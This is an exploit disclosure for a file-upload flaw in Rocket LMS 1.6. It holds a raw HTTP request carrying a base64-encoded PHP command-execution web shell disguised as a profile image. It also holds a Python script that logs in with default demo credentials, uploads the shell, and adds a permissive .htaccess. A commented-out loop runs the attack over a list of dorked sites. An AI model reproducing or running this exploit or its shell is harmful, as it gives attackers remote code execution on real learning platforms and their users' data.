# Exploit Title: Rocket LMS - Learning Management System Shell Upload
# Exploit Author: th3d1gger
# Vendor Homepage: https://codecanyon.net
# Software Link: https://codecanyon.net/item/rocket-lms-learning-management-academy-script/33120735
# Version: Version 1.6
# Tested on Ubuntu 18.04

base64 encode your payload
after data image write your extension 
upload
-----
There is .htaccess restriction on rocket lms public folder upload your own htaccess to avatar folder first.

Enjoy!


-------Request-----------
POST /panel/setting HTTP/1.1
Host: localhost
Content-Length: 214
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Origin: http://localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: empty
Referer: http://localhost/panel/setting/step/2
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: allow=1; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IlBhNzBxQi96TVJwTm5KdEI0Ry9xUUE9PSIsInZhbHVlIjoiUE80Y2h6WlU2N3FjZDBaMldkZU1pcDg3ZmVLWitZSUxsQVBIc0lHdUV0ZkdtL2JYYzZ0Q2RsL1JSQXhVZWFJZGsrcGlOTGJ5Qk8zWWlTVDVWL3ZlNEY3NFpEc1RaT0NSVS9EL2lFWXQyTEtLQXlFR0RPVjREclI4QkMwdWRQb3hzcEtlZ1ZZanQ0ZDAyYWZOMjNjcWo1anFtSFdRdFYwY2laTlJLbnl2TjBVQWdKTlB6Uk4reWlJUTRNSmkrYkhXU1BJMmxpNU05TngxUklxNEM5azY0bFp4NVg2eHdwT1VSci9Od2RCQklsMD0iLCJtYWMiOiI2NzFjZDkxMDRlYWEyODBmMGUxNDg3YmFmZmQ0M2YwMzhlMmViNTYxYjk3YTZmNTk0YzA1MGFkOGY2YmFkN2I1In0%3D; XSRF-TOKEN=eyJpdiI6IjRqa1JIMXQrd0xuZW1za0FXR0lVbGc9PSIsInZhbHVlIjoidXlybG4rTlRraVpXV1dRSE5EWXcrYnVyZnpYUHRmSmpvQ0tuUUI3WEFDZU5HdWpsbXJBRi9WaStzWXVDNEJLa2UzT3BTSkdobzdPc0dUb0V1TzUyMGdPVHRHY3NNR0x2YlpVT1YxMy9DYXVIMGxERktaZXZtT1pPQUF4Y0N6U0IiLCJtYWMiOiI2MTAyMGJlZmFhNjk2ZWRiOWViYjVlZWNhOWUyYzFmYTJjNjdmYTdmZWNmY2ZhMTFjMTg3NmQwMDAxNjg1OTVjIn0%3D; rocketlms_session=eyJpdiI6Ik1yOGpZZmFGRnJMY1BBYkNBVUhYT1E9PSIsInZhbHVlIjoiOWkrN1JmUHhqc21qTlZqdytPdUJaSnpPQW0ybXNlVGpWLzViVzFpbHpheUF2QUJYRTJNUmpCaC9xZk5CRWg1eGpiVFZ4ejFOOTdLZ3NmNTkrQlhheTBBUGNVVDdPa3IvVWVSeTZ3RndxV2FRdWpWRnVvSHhzY2xKUjMvelB4dTAiLCJtYWMiOiIzNTdlNTNmNGNlMDFlMTU5NWVlOTQ1NjM0YjFjZGU4NWJmMTg5NzIzNmRhMTQxMzc4MDIyZGU2ZDM2N2JiODg2In0%3D
Connection: close

_token=vILAoLnB2BFEaF35K4kMmwLokzOPLMnryeYXQVzS&step=2&next_step=0&profile_image=data%3Aimage%2FPHP%3Bbase64%2CPD9waHAgJGNtZCA9IHN5c3RlbSgkX0dFVFsnY21kJ10pOwoKZWNobyAkY21kOwo/Pg==
&cover_img=%2Fstore%2F995%2F7.jpg



Exploit:


import time
import requests
import base64
import re

import traceback
class Rocket:
    def __init__(self,ssl,host,port,email,password,file):
        self._url_to_upload = "/panel/setting"
        self._url_to_login = "/login"
        self.host = host
        self.port = port
        self.ssl = ssl
        self.email = email
        self.password = password
        self.file = file
    def get_csrf_token(self,client,URL):
       
        fromt = client.get(URL)  

        if 'XSRF-TOKEN' in client.cookies:
    
            csrftoken = re.findall(r'<input type="hidden" name="_token" value="(.*)"',fromt.text)[0]

            return csrftoken

        else:
   
            print("Error while fetching token")
            return

    def login(self):
        client = requests.session()


        if self.ssl == True:
            ssl= "https://"
        else:
            ssl= "http://"
        URL = str(ssl+self.host+":"+self.port+self._url_to_login)
        URL2 = str(ssl+self.host+":"+self.port+self._url_to_upload)
        csrftoken = self.get_csrf_token(client,URL)
        fromt = client.get(URL)  # sets cookie
      
        login_data = dict(username=self.email, password=self.password, _token=csrftoken, next='/panel')
        r = client.post(URL, data=login_data, cookies=client.cookies)
   
        
        self.upload_shell(client,URL2)
        self.upload_htaccess(client,URL2)
    def upload_shell(self,client,URL):
        csrftoken = self.get_csrf_token(client,URL)
        with open(self.file,"r") as payload:
            to_base64 = payload.read()
             
            to_base64 = str(to_base64).encode("utf-8")
            base64_encoded_data=  base64.b64encode(to_base64)
            base64_encoded_data = str(base64_encoded_data)[:-1]
            base64_encoded_data = str(base64_encoded_data)[2:]
            
            string = "data:image/php;base64,"+str(base64_encoded_data)
            data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")
            r = client.post(URL, data=data, cookies=client.cookies)
            print(r.status_code)
            if r.status_code == 200:
                print("sent and uploaded shell :"+URL+"\n")

            else: 
                print("couldn't upload shell")
     

    def upload_htaccess(self,client,URL):
        csrftoken = self.get_csrf_token(client,URL)
   
        string = "data:image/.htaccess;base64,UmV3cml0ZUVuZ2luZSBPbgpPcHRpb25zICtJbmRleGVzClJld3JpdGVCYXNlIC8KQWxsb3cgZnJvbSBhbGwKPEZpbGVzTWF0Y2ggIlwuKD9pOnBocCkkIj4KICAgIDxJZk1vZHVsZSAhbW9kX2F1dGh6X2NvcmUuYz4KICAgICAgT3JkZXIgYWxsb3csZGVueQogICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9JZk1vZHVsZT4KICAgIDxJZk1vZHVsZSBtb2RfYXV0aHpfY29yZS5jPgogICAgICBSZXF1aXJlIGFsbCBncmFudGVkCiAgICA8L0lmTW9kdWxlPgogIDwvRmlsZXNNYXRjaD4="
        data = dict(_token=csrftoken,step=2,next_step=0,profile_image=string,cover_img="")
        r = client.post(URL, data=data, cookies=client.cookies)
        print(r.status_code)
        if r.status_code == 200:
            print("sent and uploaded htaccess:"+URL+"\n")
            print("Go and rename file in filemanager on website")
        else: 
            print("couldn't upload htaccess")

 

elon = Rocket(True,"localhost","443","student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")
elon.login()




#with dork
# try:
#     with open("sites.txt","r") as urls:
#         url = urls.readlines()
#         ssl = True
#         port = 443
#         for line in url:
            
#             try:
#                 if "sslyok" in line:
#                     port = 80
#                     ssl = False
#                 line = str(line.rstrip('%0a'))
                
#                 print("trying:"+line)
#                 elon = Rocket(ssl,line.rstrip("\n"),str(port),"student@demo.com","student" ,"/home/mm1nd/Desktop/shell.txt")
#                 elon.login()
#                 time.sleep(1)    
#             except Exception:
#                 #traceback.print_exc()
#                 print("atamadim")
                
#             finally:
#                 print("okey")
# except Exception:
#                 print("atamadim")